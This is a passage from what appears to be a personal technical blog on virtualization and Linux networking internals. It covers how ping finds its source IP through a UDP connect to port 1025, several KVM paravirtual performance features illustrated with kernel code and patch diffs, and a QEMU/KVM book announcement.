            * ensuring that the loads of index->ctr are sequentially consistent.
            */
            smp_mb_global();

            QLIST_FOREACH_SAFE(index, &registry, node, tmp) {
                if (!rcu_gp_ongoing(&index->ctr)) {
                    QLIST_REMOVE(index, node);
                    QLIST_INSERT_HEAD(&qsreaders, index, node);

                    /* No need for mb_set here, worst of all we
                    * get some extra futex wakeups.
                    */
                    qatomic_set(&index->waiting, false);
                }
            }

            if (QLIST_EMPTY(&registry)) {
                break;
            }

            /* Wait for one thread to report a quiescent state and try again.
            * Release rcu_registry_lock, so rcu_(un)register_thread() doesn't
            * wait too much time.
            *
            * rcu_register_thread() may add nodes to &registry; it will not
            * wake up synchronize_rcu, but that is okay because at least another
            * thread must exit its RCU read-side critical section before
            * synchronize_rcu is done.  The next iteration of the loop will
            * move the new thread's rcu_reader from &registry to &qsreaders,
            * because rcu_gp_ongoing() will return false.
            *
            * rcu_unregister_thread() may remove nodes from &qsreaders instead
            * of &registry if it runs during qemu_event_wait.  That's okay;
            * the node then will not be added back to &registry by QLIST_SWAP
            * below.  The invariant is that the node is part of one list when
            * rcu_registry_lock is released.
            */
            qemu_mutex_unlock(&rcu_registry_lock);
            qemu_event_wait(&rcu_gp_event);
            qemu_mutex_lock(&rcu_registry_lock);
        }

        /* put back the reader list in the registry */
        QLIST_SWAP(&registry, &qsreaders, node);
    }


    static inline int rcu_gp_ongoing(unsigned long *ctr)
    {
        unsigned long v;

        v = qatomic_read(ctr);
        return v && (v != rcu_gp_ctr);
    }

Why ping uses UDP port 1025

2021-02-19T00:00:00+00:00

Recently I noticed that the ping source code has an interesting trick. It creates a UDP socket and bind connect to the destnation using port 1025. The code is here.

At first glance it is strange as we know the ping just uses ICMP to detect the connection of two ip.

So Let’s see what happened.

In one terminal we use tcpdump to capture the packet.

    root@ubuntu:/home/test# tcpdump -nn -vv host 8.8.8.8

In another terminal we strace the ping.

    test@ubuntu:~$ strace -o ping.txt ping 8.8.8.8 -c 1

After the ping terminated. We can see the tcmpdump has no packet related with the 1025 port.

    root@ubuntu:/home/test# tcpdump -nn -vv host 8.8.8.8
    tcpdump: listening on ens33, link-type EN10MB (Ethernet), capture size 262144 bytes
    07:29:19.390097 IP (tos 0x0, ttl 64, id 9390, offset 0, flags [DF], proto ICMP (1), length 84)
        192.168.80.146 > 8.8.8.8: ICMP echo request, id 2, seq 1, length 64
    07:29:19.688639 IP (tos 0x0, ttl 128, id 44019, offset 0, flags [none], proto ICMP (1), length 84)
        8.8.8.8 > 192.168.80.146: ICMP echo reply, id 2, seq 1, length 64

Let’s see the strace log.

    socket(AF_INET, SOCK_DGRAM, IPPROTO_IP) = 5
    connect(5, {sa_family=AF_INET, sin_port=htons(1025), sin_addr=inet_addr("8.8.8.8")}, 16) = 0
    getsockname(5, {sa_family=AF_INET, sin_port=htons(43043), sin_addr=inet_addr("192.168.80.146")}, [16]) = 0
    close(5)                                = 0

The UDP 1025 port is just there and exists just socket/connect/getsockname/close.

So after search the internet I just found this is a trick to get current source IP that ping program used.

The use of 1025 is in the condition of no source ip specified. If we specify the source IP, there is no connect in the strace log.

    test@ubuntu:~$ strace -o ping.txt ping -I 192.168.80.146  8.8.8.8 -c 1

Finally let’s just go to kernel to see.

    SYSCALL_DEFINE3(connect, int, fd, struct sockaddr __user *, uservaddr,
            int, addrlen)
    {
        return __sys_connect(fd, uservaddr, addrlen);
    }

    __sys_connect
        ->__sys_connect_file
            ->sock->ops->connect(inet_stream_connect)
                ->__inet_stream_connect
                    ->sk->sk_prot->connect(ip4_datagram_connect)
                        ->__ip4_datagram_connect
                            ->ip_route_connect
                                ->ip_route_connect_init
                                ->__ip_route_output_key
                                    ->ip_route_output_key_hash
                                        ->ip_route_output_key_hash_rcu
                                ->flowi4_update_output
                                ->ip_route_output_flow

It seems that ‘ip_route_output_key_hash_rcu’ choose the source address.

    ip_route_output_key_hash_rcu
	if (!fl4->saddr) {
		if (ipv4_is_multicast(fl4->daddr))
			fl4->saddr = inet_select_addr(dev_out, 0,
						      fl4->flowi4_scope);
		else if (!fl4->daddr)
			fl4->saddr = inet_select_addr(dev_out, 0,
						      RT_SCOPE_HOST);
	}


    __ip4_datagram_connect
    if (!inet->inet_saddr)
        inet->inet_saddr = fl4->saddr;	/* Update source address */

In the getsockname syscall, we can see it gets the source IP from ‘inet->inet_saddr’.

    int inet_getname(struct socket *sock, struct sockaddr *uaddr,
            int peer)
    {
        struct sock *sk		= sock->sk;
        struct inet_sock *inet	= inet_sk(sk);
        DECLARE_SOCKADDR(struct sockaddr_in *, sin, uaddr);

        sin->sin_family = AF_INET;
        if (peer) {
            ...
        } else {
            __be32 addr = inet->inet_rcv_saddr;
            if (!addr)
                addr = inet->inet_saddr;
            sin->sin_port = inet->inet_sport;
            sin->sin_addr.s_addr = addr;
        }
        ...
    }
    EXPORT_SYMBOL(inet_getname);

Reference

https://echorand.me/posts/my-own-ping/

https://jeffpar.github.io/kbarchive/kb/129/Q129065/

https://github.com/iputils/iputils/issues/125

https://stackoverflow.com/questions/25879280/getting-my-own-ip-address-by-connecting-using-udp-socket

kvm performance optimization technologies, part two

2020-10-01T00:00:00+00:00

In full virtualization the guest OS doesn’t aware of it is running in an VM. If the OS knows it is running in an VM it can do some optimizations to improve the performance. This is called para virtualization(pv). From a generally speaking, Any technology used in the guest OS that it is based the assumption that it is running in a VM can be called a pv technology. For example the virtio is a para framework, and the apf is also a para feature. However in this post, I will not talk about these more complicated feature but some more small performance optimization feature in pv.

One of the most important thing in VM optimization is to reduce the VM-exit as much as possible, the best is there is no VM-exit.

This is the second part of kvm performance optimization technoligies followin up the part one. This post contains the following pv optimization:

PV unhalt
Host/Guest halt poll
Disable mwait/hlt/pause
Exitless timer

PV unhalt

Its name maybe make confusion. In fact it’s about spinlock. In virtualization environment, the spinlock holder vcpu may be preempted by scheduler. The other vcpu which is try get the spinlock will be spinning until the holder vcpu is scheduled again which may be a quite long time.

The PV unhalt feature is used to set the pv_lock_ops to rewrite the native spinlock’s function so it can be more optimizated. More reference can be found in here and here.

Though the total implementation of pv spinlock is related with the spinlock implementation such as ticketlock and queued spinlock, the basic idea behind the pv spinlock is the same. That is instead of spining while the vcpu can’t get the spinlock it will execute halt instruction and let the other vcpu got scheduled.

guest side

When the guest startup, ‘kvm_spinlock_init’ is used to initialize the pv spinlock.

    void __init kvm_spinlock_init(void)
    {
        /* Does host kernel support KVM_FEATURE_PV_UNHALT? */
        if (!kvm_para_has_feature(KVM_FEATURE_PV_UNHALT))
            return;

        if (kvm_para_has_hint(KVM_HINTS_REALTIME))
            return;

        /* Don't use the pvqspinlock code if there is only 1 vCPU. */
        if (num_possible_cpus() == 1)
            return;

        __pv_init_lock_hash();
        pv_ops.lock.queued_spin_lock_slowpath = __pv_queued_spin_lock_slowpath;
        pv_ops.lock.queued_spin_unlock =
            PV_CALLEE_SAVE(__pv_queued_spin_unlock);
        pv_ops.lock.wait = kvm_wait;
        pv_ops.lock.kick = kvm_kick_cpu;

        if (kvm_para_has_feature(KVM_FEATURE_STEAL_TIME)) {
            pv_ops.lock.vcpu_is_preempted =
                PV_CALLEE_SAVE(__kvm_vcpu_is_preempted);
        }
    }

The most function is ‘kvm_wait’ and ‘kvm_ick_cpu’ by ‘pv_wait’.

    static __always_inline void pv_wait(u8 *ptr, u8 val)
    {
        PVOP_VCALL2(lock.wait, ptr, val);
    }

Then it will execute the halt instruction in ‘kvm_wait’.

    static void kvm_wait(u8 *ptr, u8 val)
    {
        unsigned long flags;

        if (in_nmi())
            return;

        local_irq_save(flags);

        if (READ_ONCE(*ptr) != val)
            goto out;

        /*
        * halt until it's our turn and kicked. Note that we do safe halt
        * for irq enabled case to avoid hang when lock info is overwritten
        * in irq spinlock slowpath and no spurious interrupt occur to save us.
        */
        if (arch_irqs_disabled_flags(flags))
            halt();
        else
            safe_halt();

    out:
        local_irq_restore(flags);
    }

When the vcpu can’t get the spinlock, it will call wait callback. When the vcpu can get the spinlock, the ‘kick’ callback will be called by ‘pv_kick’. The ‘kvm_kick_cpu’ will be called and this trigger a KVM_HC_KICK_CPU hypercall.

    static void kvm_kick_cpu(int cpu)
    {
        int apicid;
        unsigned long flags = 0;

        apicid = per_cpu(x86_cpu_to_apicid, cpu);
        kvm_hypercall2(KVM_HC_KICK_CPU, flags, apicid);
    }

kvm side

First of all, the kvm should expose the ‘KVM_FEATURE_PV_UNHALT’ to the guest.

    case KVM_CPUID_FEATURES:
        entry->eax = (1 << KVM_FEATURE_CLOCKSOURCE) |
                (1 << KVM_FEATURE_NOP_IO_DELAY) |
                (1 << KVM_FEATURE_CLOCKSOURCE2) |
                (1 << KVM_FEATURE_ASYNC_PF) |
                (1 << KVM_FEATURE_PV_EOI) |
                (1 << KVM_FEATURE_CLOCKSOURCE_STABLE_BIT) |
                (1 << KVM_FEATURE_PV_UNHALT) |
                ...

When the guest execute halt instruction, the ‘kvm_emulate_halt’->’kvm_vcpu_halt’ will be called. This will set the ‘vcpu->arch.mp_state to ‘KVM_MP_STATE_HALTED’. Then ‘vcpu_block’ will be called to block this vcpu.

    static inline int vcpu_block(struct kvm *kvm, struct kvm_vcpu *vcpu)
    {
        if (!kvm_arch_vcpu_runnable(vcpu) &&
            (!kvm_x86_ops.pre_block || kvm_x86_ops.pre_block(vcpu) == 0)) {
            srcu_read_unlock(&kvm->srcu, vcpu->srcu_idx);
            kvm_vcpu_block(vcpu);
            vcpu->srcu_idx = srcu_read_lock(&kvm->srcu);

            if (kvm_x86_ops.post_block)
                kvm_x86_ops.post_block(vcpu);

            if (!kvm_check_request(KVM_REQ_UNHALT, vcpu))
                return 1;
        }

        kvm_apic_accept_events(vcpu);
        switch(vcpu->arch.mp_state) {
        case KVM_MP_STATE_HALTED:
            vcpu->arch.pv.pv_unhalted = false;
            vcpu->arch.mp_state =
                KVM_MP_STATE_RUNNABLE;
            /* fall through */
        case KVM_MP_STATE_RUNNABLE:
            vcpu->arch.apf.halted = false;
            break;
        case KVM_MP_STATE_INIT_RECEIVED:
            break;
        default:
            return -EINTR;
        }
        return 1;
    }

When the guest trigger ‘KVM_HC_KICK_CPU’ hypercall, ‘kvm_pv_kick_cpu_op’ and ‘kvm_sched_yield’ will be called.

    int kvm_emulate_hypercall(struct kvm_vcpu *vcpu)
    {
        case KVM_HC_KICK_CPU:
            kvm_pv_kick_cpu_op(vcpu->kvm, a0, a1);
            kvm_sched_yield(vcpu->kvm, a1);
    }

The ‘kvm_pv_kick_cpu_op’ will send an interrupt to the lapic.

    static void kvm_pv_kick_cpu_op(struct kvm *kvm, unsigned long flags, int apicid)
    {
        struct kvm_lapic_irq lapic_irq;

        lapic_irq.shorthand = APIC_DEST_NOSHORT;
        lapic_irq.dest_mode = APIC_DEST_PHYSICAL;
        lapic_irq.level = 0;
        lapic_irq.dest_id = apicid;
        lapic_irq.msi_redir_hint = false;

        lapic_irq.delivery_mode = APIC_DM_REMRD;
        kvm_irq_delivery_to_apic(kvm, NULL, &lapic_irq, NULL);
    }

Then in ‘__apic_accept_irq’ it will kick the blocked vcpu.

    case APIC_DM_REMRD:
        result = 1;
        vcpu->arch.pv.pv_unhalted = 1;
        kvm_make_request(KVM_REQ_EVENT, vcpu);
        kvm_vcpu_kick(vcpu);
        break;

The ‘kvm_vcpu_block’ returns, it will set ‘vcpu->arch.mp_state’ to ‘KVM_MP_STATE_RUNNABLE’ and let the vcpu get the spinlock.

Host/Guest halt poll

Under some circumstances, the overhead of context switch from ide->running or running->idle is high, especially the halt instruction. The host halt poll is that when the vcpu execute halt instruction and cause VM-exit, in the ‘kvm_vcpu_block’ function, it will poll for conditions before giving the cpu to scheduler.

    if (vcpu->halt_poll_ns && !kvm_arch_no_poll(vcpu)) {
        ktime_t stop = ktime_add_ns(ktime_get(), vcpu->halt_poll_ns);

        ++vcpu->stat.halt_attempted_poll;
        do {
            /*
            * This sets KVM_REQ_UNHALT if an interrupt
            * arrives.
            */
            if (kvm_vcpu_check_block(vcpu) < 0) {
                ++vcpu->stat.halt_successful_poll;
                if (!vcpu_valid_wakeup(vcpu))
                    ++vcpu->stat.halt_poll_invalid;
                goto out;
            }
            poll_end = cur = ktime_get();
        } while (single_task_running() && ktime_before(cur, stop));
    }

This code is quite simple, if the condision has came, it will ‘goto out’ and the vcpu will not be blocked.

Guest halt poll is solution to avoid this overhead. It will poll in the guest kernel instead of the host kernel. Compared with kvm halt poll, the guest halt poll also reduce the context switch from non-root mode to root-mode.

Before entering the halt, it will poll some time.

    static int __cpuidle poll_idle(struct cpuidle_device *dev,
                    struct cpuidle_driver *drv, int index)
    {
        u64 time_start = local_clock();

        dev->poll_time_limit = false;

        local_irq_enable();
        if (!current_set_polling_and_test()) {
            unsigned int loop_count = 0;
            u64 limit;

            limit = cpuidle_poll_time(drv, dev);

            while (!need_resched()) {
                cpu_relax();
                if (loop_count++ < POLL_IDLE_RELAX_COUNT)
                    continue;

                loop_count = 0;
                if (local_clock() - time_start > limit) {
                    dev->poll_time_limit = true;
                    break;
                }
            }
        }
        current_clr_polling();

        return index;
    }

When sending IPI to cpu it will check whether the poll flag is setting, if it is, it just set the ‘_TIF_NEED_RESCHED’

    static bool set_nr_if_polling(struct task_struct *p)
    {
        struct thread_info *ti = task_thread_info(p);
        typeof(ti->flags) old, val = READ_ONCE(ti->flags);

        for (;;) {
            if (!(val & _TIF_POLLING_NRFLAG))
                return false;
            if (val & _TIF_NEED_RESCHED)
                return true;
            old = cmpxchg(&ti->flags, val, val | _TIF_NEED_RESCHED);
            if (old == val)
                break;
            val = old;
        }
        return true;
    }

    void send_call_function_single_ipi(int cpu)
    {
        struct rq *rq = cpu_rq(cpu);

        if (!set_nr_if_polling(rq->idle))
            arch_send_call_function_single_ipi(cpu);
        else
            trace_sched_wake_idle_without_ipi(cpu);
    }

This will avoid the sending IPI interrupt.

There is a cpuid feature bit ‘KVM_FEATURE_POLL_CONTROL’ to control use which halt poll. If this bit is set in the cpuid it means uses the host halt poll, otherwise it will uses the guest halt poll.

    void arch_haltpoll_enable(unsigned int cpu)
    {
        if (!kvm_para_has_feature(KVM_FEATURE_POLL_CONTROL)) {
            pr_err_once("kvm: host does not support poll control\n");
            pr_err_once("kvm: host upgrade recommended\n");
            return;
        }

        /* Enable guest halt poll disables host halt poll */
        smp_call_function_single(cpu, kvm_disable_host_haltpoll, NULL, 1);
    }
    EXPORT_SYMBOL_GPL(arch_haltpoll_enable);

    void arch_haltpoll_disable(unsigned int cpu)
    {
        if (!kvm_para_has_feature(KVM_FEATURE_POLL_CONTROL))
            return;

        /* Enable guest halt poll disables host halt poll */
        smp_call_function_single(cpu, kvm_enable_host_haltpoll, NULL, 1);
    }

Disable mwait/hlt/pause

In some workloads it will improve latency if the mwait/hlt/pause doesn’t cause VM-exit. The userspace(qemu) can check and set per-VM capability(KVM_CAP_X86_DISABLE_EXITS) to not intercept mwait/hlt/pause instruction.

‘kvm_arch’ has following fields, the userspace can set these field:

    bool mwait_in_guest;
    bool hlt_in_guest;
    bool pause_in_guest;
    bool cstate_in_guest;

In the VM initialization, it will check these field and set the coressponding vmcs field. For example, the mwait and hlt case.

    u32 vmx_exec_control(struct vcpu_vmx *vmx)
    {
        ...
        if (kvm_mwait_in_guest(vmx->vcpu.kvm))
            exec_control &= ~(CPU_BASED_MWAIT_EXITING |
                    CPU_BASED_MONITOR_EXITING);
        if (kvm_hlt_in_guest(vmx->vcpu.kvm))
            exec_control &= ~CPU_BASED_HLT_EXITING;
        return exec_control;
    }

Exitless timer

This feature is also implemented by Wanpeng Li. Here is the slides. The patches is here.

Both programming timer in guest and the emulated timer fires will cause VM-exit. Exitless timer uses the housekeeping CPUs to delivery interrupt via posted-interrupt.

    static void apic_timer_expired(struct kvm_lapic *apic, bool from_timer_fn)
    {
        struct kvm_vcpu *vcpu = apic->vcpu;
        struct kvm_timer *ktimer = &apic->lapic_timer;

        if (atomic_read(&apic->lapic_timer.pending))
            return;

        if (apic_lvtt_tscdeadline(apic) || ktimer->hv_timer_in_use)
            ktimer->expired_tscdeadline = ktimer->tscdeadline;

        ...

        if (kvm_use_posted_timer_interrupt(apic->vcpu)) {
            if (apic->lapic_timer.timer_advance_ns)
                __kvm_wait_lapic_expire(vcpu);
            kvm_apic_inject_pending_timer_irqs(apic);
            return;
        }

        atomic_inc(&apic->lapic_timer.pending);
        kvm_set_pending_timer(vcpu);
    }

‘kvm_apic_inject_pending_timer_irqs’ is used to inject the timer interrupt.

    static void kvm_apic_inject_pending_timer_irqs(struct kvm_lapic *apic)
    {
        struct kvm_timer *ktimer = &apic->lapic_timer;

        kvm_apic_local_deliver(apic, APIC_LVTT);
        if (apic_lvtt_tscdeadline(apic)) {
            ktimer->tscdeadline = 0;
        } else if (apic_lvtt_oneshot(apic)) {
            ktimer->tscdeadline = 0;
            ktimer->target_expiration = 0;
        }
    }

It just delivery a APIC_LVTT timer to the apic. It will go to the ‘case APIC_DM_FIXED’ in ‘__apic_accept_irq’ then inject the timer interrupt through posted-interrupt.

My qemu/kvm book has been publicated

2020-09-11T00:00:00+00:00

During my study/work of virtualization, I have to dig into the code. It’s a lot of code I have to analysis, the SeaBIOS, the Linux kernel driver, the QEMU and so on. In this exceting journey I have written a lot of virtualization-related material. A lot of people has asked me some question while reading my blog.

Two years ago I decided to write a qemu/kvm book, not just it can help people but also it’s a memorial of my virtualization exploration. After countless night and weekends hard working, Fianlly it comes.

It’s Chinese name is 《QEMU/KVM源码解析与应用》，I think it’s English name can be ‘QEMU/KVM internals’.

This contains the very detailed analysis of qemu/kvm-related virtualization technologies.

Basic build block such as event loop framework, thread model, qom
The firmware emulation, contains the SeaBIOS analysis
The CPU emulation, memory emulation, device emulation and interrupt emulation
Finally it contains some misc topic like VM migration, QGA and qemu security

It can be found in following websites:

kvm performance optimization technologies, part one

2020-09-10T00:00:00+00:00

One of the most important thing in VM optimization is to reduce the VM-exit as much as possible, the best is there is no VM-exit.

This post contains the following pv optimization:

Passthrough IPI
PV Send IPI
PV TLB Shootdown
PV sched yield
PV EOI

Passthrough IPI

Let’s first take an example of a proposed PV feature by bytedance and also a paper. It’s Passthrough IPI.

When the guest issues IPI, it will write the ICR register of LAPIC. This normally causes VM-exit as the LAPIC is emulated by vmm. ‘Passthrough IPI’try to avoid this VM-exit and VM-entry by exposing the guest with posted interrupt capability. Following pic shows the basic idea which from the above paper.

Following pic shows more detailed for this feature.

kvm side

When creating VM, the userspace should set the gpa mapping to the pi_desc by ioctl(KVM_SET_PVIPI_ADDR). ‘vmx_set_pvipi_addr’ will set the ept table for this gpa.

    +static int vmx_set_pvipi_addr(struct kvm *kvm, unsigned long addr)
    +{
    +	int ret;
    +
    +	if (!enable_apicv || !x2apic_enabled())
    +		return 0;
    +
    +	if (!IS_ALIGNED(addr, PAGE_SIZE)) {
    +		pr_err("addr is not aligned\n");
    +		return 0;
    +	}
    +
    +	ret = x86_set_memory_region(kvm, PVIPI_PAGE_PRIVATE_MEMSLOT, addr,
    +				    PAGE_SIZE * PI_DESC_PAGES);
    +	if (ret)
    +		return ret;
    +
    +	to_kvm_vmx(kvm)->pvipi_gfn = addr >> PAGE_SHIFT;
    +	kvm_pvipi_init(kvm, to_kvm_vmx(kvm)->pvipi_gfn);
    +
    +	return ret;
    +
    +}

‘kvm_pvipi_init’ will store the pvipi addr.

    +void kvm_pvipi_init(struct kvm *kvm, u64 pi_desc_gfn)
    +{
    +	kvm->arch.pvipi.addr = pi_desc_gfn;
    +	kvm->arch.pvipi.count = PI_DESC_PAGES;
    +	/* make sure addr and count is visible before set valid bit */
    +	smp_wmb();
    +	kvm->arch.pvipi.valid = 1;
    +}

When creating vcpu, we setup the pi_desc page

    +static int pi_desc_setup(struct kvm_vcpu *vcpu)
    +{
    +	struct kvm_vmx *kvm_vmx = to_kvm_vmx(vcpu->kvm);
    +	struct page *page;
    +	int page_index, ret = 0;
    +
    +	page_index = vcpu->vcpu_id / PI_DESC_PER_PAGE;
    +
    +	/* pin pages in memory */
    +	/* TODO: allow to move those page to support memory unplug.
    +	 * See commtnes in kvm_vcpu_reload_apic_access_page for details.
    +	 */
    +	page = kvm_vcpu_gfn_to_page(vcpu, kvm_vmx->pvipi_gfn + page_index);
    +	if (is_error_page(page)) {
    +		ret = -EFAULT;
    +		goto out;
    +	}
    +
    +	to_vmx(vcpu)->pi_desc = page_address(page)
    +		+ vcpu->vcpu_id * PI_DESC_SIZE;
    +out:
    +	return ret;
    +}

We can see this pi_desc is shared between the ‘guest’ and the vcpu struct.

The guest can read the ‘MSR_KVM_PV_IPI’ to get this shared pi_desc.

    +	case MSR_KVM_PV_IPI:
    +		msr_info->data =
    +			(vcpu->kvm->arch.pvipi.msr_val & ~(u64)0x1) |
    +			vcpu->arch.pvipi_enabled;
    +		break;

The guest can write the ‘MSR_KVM_PV_IPI’ to enable/disable this feature. If the guest disable this feature it will intercept ‘X2APIC_MSR(APIC_ICR)’ MSR and the ‘pvipi_enabled’ is fale. If the guest enable this feature it will not intercept the ‘X2APIC_MSR(APIC_ICR)’ MSR and this allow the guest write this MSR directly.

    +	case MSR_KVM_PV_IPI:
    +		if (!vcpu->kvm->arch.pvipi.valid)
    +			break;
    +
    +		/* Userspace (e.g., QEMU) initiated disabling PV IPI */
    +		if (msr_info->host_initiated && !(data & KVM_PV_IPI_ENABLE)) {
    +			vmx_enable_intercept_for_msr(vmx->vmcs01.msr_bitmap,
    +						     X2APIC_MSR(APIC_ICR),
    +						     MSR_TYPE_RW);
    +			vcpu->arch.pvipi_enabled = false;
    +			pr_debug("host-initiated disabling PV IPI on vcpu %d\n",
    +			       vcpu->vcpu_id);
    +			break;
    +		}
    +
    +		if (!kvm_x2apic_mode(vcpu))
    +			break;
    +
    +		if (data & KVM_PV_IPI_ENABLE && !vcpu->arch.pvipi_enabled) {
    +			vmx_disable_intercept_for_msr(vmx->vmcs01.msr_bitmap,
    +					X2APIC_MSR(APIC_ICR), MSR_TYPE_RW);
    +			vcpu->arch.pvipi_enabled = true;
    +			pr_emerg("enable pv ipi for vcpu %d\n", vcpu->vcpu_id);
    +		}
    +		break;

guest side

When gust startup it will check ‘KVM_FEATURE_PV_IPI’ feature and if it exists ‘kvm_setup_pv_ipi2’ will be called.

    +static int kvm_setup_pv_ipi2(void)
    +{
    +	union pvipi_msr msr;
    +
    +	rdmsrl(MSR_KVM_PV_IPI, msr.msr_val);
    +
    +	if (msr.valid != 1)
    +		return -EINVAL;
    +
    +	if (msr.enable) {
    +		/* set enable bit and read back. */
    +		wrmsrl(MSR_KVM_PV_IPI, msr.msr_val | KVM_PV_IPI_ENABLE);
    +
    +		rdmsrl(MSR_KVM_PV_IPI, msr.msr_val);
    +
    +		if (!(msr.msr_val & KVM_PV_IPI_ENABLE)) {
    +			pr_emerg("pv ipi enable failed\n");
    +			iounmap(pi_desc_page);
    +			return -EINVAL;
    +		}
    +
    +		goto out;
    +	} else {
    +
    +		pi_desc_page = ioremap_cache(msr.addr << PAGE_SHIFT,
    +				PAGE_SIZE << msr.count);
    +
    +		if (!pi_desc_page)
    +			return -ENOMEM;
    +
    +
    +		pr_emerg("pv ipi msr val %lx, pi_desc_page %lx, %lx\n",
    +				(unsigned long)msr.msr_val,
    +				(unsigned long)pi_desc_page,
    +				(unsigned long)&pi_desc_page[1]);
    +
    +		/* set enable bit and read back. */
    +		wrmsrl(MSR_KVM_PV_IPI, msr.msr_val | KVM_PV_IPI_ENABLE);
    +
    +		rdmsrl(MSR_KVM_PV_IPI, msr.msr_val);
    +
    +		if (!(msr.msr_val & KVM_PV_IPI_ENABLE)) {
    +			pr_emerg("pv ipi enable failed\n");
    +			iounmap(pi_desc_page);
    +			return -EINVAL;
    +		}
    +		apic->send_IPI = kvm_send_ipi;
    +		apic->send_IPI_mask = kvm_send_ipi_mask2;
    +		apic->send_IPI_mask_allbutself = kvm_send_ipi_mask_allbutself2;
    +		apic->send_IPI_allbutself = kvm_send_ipi_allbutself2;
    +		apic->send_IPI_all = kvm_send_ipi_all2;
    +		apic->icr_read = kvm_icr_read;
    +		apic->icr_write = kvm_icr_write;
    +		pr_emerg("pv ipi enabled\n");
    +	}
    +out:
    +	pr_emerg("pv ipi KVM setup real PV IPIs for cpu %d\n",
    +			smp_processor_id());
    +
    +	return 0;
    }

This function get the shared pi_desc’s GPA and if enable case it will map this GPA to GVA by calling ‘ioremap_cache’ and then write the ‘MSR_KVM_PV_IPI’ with enable bit set. This function will also replace the apic callback to its own.

In order the guest will access the LAPIC’s ICR, this feature introduces a ‘MSR_KVM_PV_ICR’ MSR to expose the physical LAPIC’s ICR to the VM.

guest trigger IPI

When the guest send IPI the ‘kvm_send_ipi’.

    +static void kvm_send_ipi(int cpu, int vector)
    +{
    +	/* In x2apic mode, apicid is equal to vcpu id.*/
    +	u32 vcpu_id = per_cpu(x86_cpu_to_apicid, cpu);
    +	unsigned int nv, dest/* , val */;
    +
    +	x2apic_wrmsr_fence();
    +
    +	WARN(vector == NMI_VECTOR, "try to deliver NMI");
    +
    +	/* TODO: rollback to old approach. */
    +	if (vcpu_id >= MAX_PI_DESC)
    +		return;
    +
    +	if (pi_test_and_set_pir(vector, &pi_desc_page[vcpu_id]))
    +		return;
    +
    +	if (pi_test_and_set_on(&pi_desc_page[vcpu_id]))
    +		return;
    +
    +	nv = pi_desc_page[vcpu_id].nv;
    +	dest = pi_desc_page[vcpu_id].ndst;
    +
    +	x2apic_send_IPI_dest(dest, nv, APIC_DEST_PHYSICAL);
    +
    +}

As we can see it get the ‘nv’ and ‘dest’ from the shared pi_desc page and call ‘x2apic_send_IPI_dest’ to send the pi notification vector to ‘dest’ vcpu. From the LAPIC view, this is just a posted-interrupt. If the guest is running it will trigger virtual interrupt delivery and if the guest is preempted it will be kicked to run.

PV send IPI

Wanpeng Li from Tencent also proposed a pv ipi feature and was merged into upstream. Following pic shows the idea from Boosting Dedicated Instance via KVM Tax Cut.

Instead of sending the IPI to vcpu one by one, the pv ipi send uses a bitmap to to record the IPI vcpu and then make a hyper call thus reduce the VM-exit. The patchset is here. Let’s see some detail

kvm side

The kvm should expose the pv send ipi feature.

    @@ -621,7 +621,8 @@ static inline int __do_cpuid_ent(struct kvm_cpuid_entry2 *entry, u32 function,
                    (1 << KVM_FEATURE_CLOCKSOURCE_STABLE_BIT) |
                    (1 << KVM_FEATURE_PV_UNHALT) |
                    (1 << KVM_FEATURE_PV_TLB_FLUSH) |
    -			     (1 << KVM_FEATURE_ASYNC_PF_VMEXIT);
    +			     (1 << KVM_FEATURE_ASYNC_PF_VMEXIT) |
    +			     (1 << KVM_FEATURE_PV_SEND_IPI);

The kvm side should also implement the hyper call.

    +/*
    + * Return 0 if successfully added and 1 if discarded.
    + */
    +static int kvm_pv_send_ipi(struct kvm *kvm, unsigned long ipi_bitmap_low,
    +		unsigned long ipi_bitmap_high, int min, int vector, int op_64_bit)
    +{
    +	int i;
    +	struct kvm_apic_map *map;
    +	struct kvm_vcpu *vcpu;
    +	struct kvm_lapic_irq irq = {
    +		.delivery_mode = APIC_DM_FIXED,
    +		.vector = vector,
    +	};
    +	int cluster_size = op_64_bit ? 64 : 32;
    +
    +	rcu_read_lock();
    +	map = rcu_dereference(kvm->arch.apic_map);
    +
    +	for_each_set_bit(i, &ipi_bitmap_low, cluster_size) {
    +		vcpu = map->phys_map[min + i]->vcpu;
    +		if (!kvm_apic_set_irq(vcpu, &irq, NULL))
    +			return 1;
    +	}
    +
    +	for_each_set_bit(i, &ipi_bitmap_high, cluster_size) {
    +		vcpu = map->phys_map[min + i + cluster_size]->vcpu;
    +		if (!kvm_apic_set_irq(vcpu, &irq, NULL))
    +			return 1;
    +	}
    +
    +	rcu_read_unlock();
    +	return 0;
    +}
    +
    void kvm_vcpu_deactivate_apicv(struct kvm_vcpu *vcpu)
    {
        vcpu->arch.apicv_active = false;
    @@ -6739,6 +6773,9 @@ int kvm_emulate_hypercall(struct kvm_vcpu *vcpu)
        case KVM_HC_CLOCK_PAIRING:
            ret = kvm_pv_clock_pairing(vcpu, a0, a1);
            break;
    +	case KVM_HC_SEND_IPI:
    +		ret = kvm_pv_send_ipi(vcpu->kvm, a0, a1, a2, a3, op_64_bit);
    +		break;
    #endif

As we can see, in the hypercall handler the ‘kvm_pv_send_ipi’ can iterate the bitmap and call ‘kvm_apic_set_irq’ to send interrupt to dest vcpu.

guest side

When the system startup it will check whether the ‘KVM_FEATURE_PV_SEND_IPI’ exists. If it does, ‘kvm_setup_pv_ipi’ will be called and the apic callback will be replaced to the PV IPI.

    +static void kvm_setup_pv_ipi(void)
    +{
    +	apic->send_IPI_mask = kvm_send_ipi_mask;
    +	apic->send_IPI_mask_allbutself = kvm_send_ipi_mask_allbutself;
    +	apic->send_IPI_allbutself = kvm_send_ipi_allbutself;
    +	apic->send_IPI_all = kvm_send_ipi_all;
    +	pr_info("KVM setup pv IPIs\n");
    +}

guest trigger IPI

‘__send_ipi_mask’ is called to send IPI to vcpu.

    +static void __send_ipi_mask(const struct cpumask *mask, int vector)
    +{
    +	unsigned long flags;
    +	int cpu, apic_id, min = 0, max = 0;
    +#ifdef CONFIG_X86_64
    +	__uint128_t ipi_bitmap = 0;
    +	int cluster_size = 128;
    +#else
    +	u64 ipi_bitmap = 0;
    +	int cluster_size = 64;
    +#endif
    +
    +	if (cpumask_empty(mask))
    +		return;
    +
    +	local_irq_save(flags);
    +
    +	for_each_cpu(cpu, mask) {
    +		apic_id = per_cpu(x86_cpu_to_apicid, cpu);
    +		if (!ipi_bitmap) {
    +			min = max = apic_id;
    +		} else if (apic_id < min && max - apic_id < cluster_size) {
    +			ipi_bitmap <<= min - apic_id;
    +			min = apic_id;
    +		} else if (apic_id < min + cluster_size) {
    +			max = apic_id < max ? max : apic_id;
    +		} else {
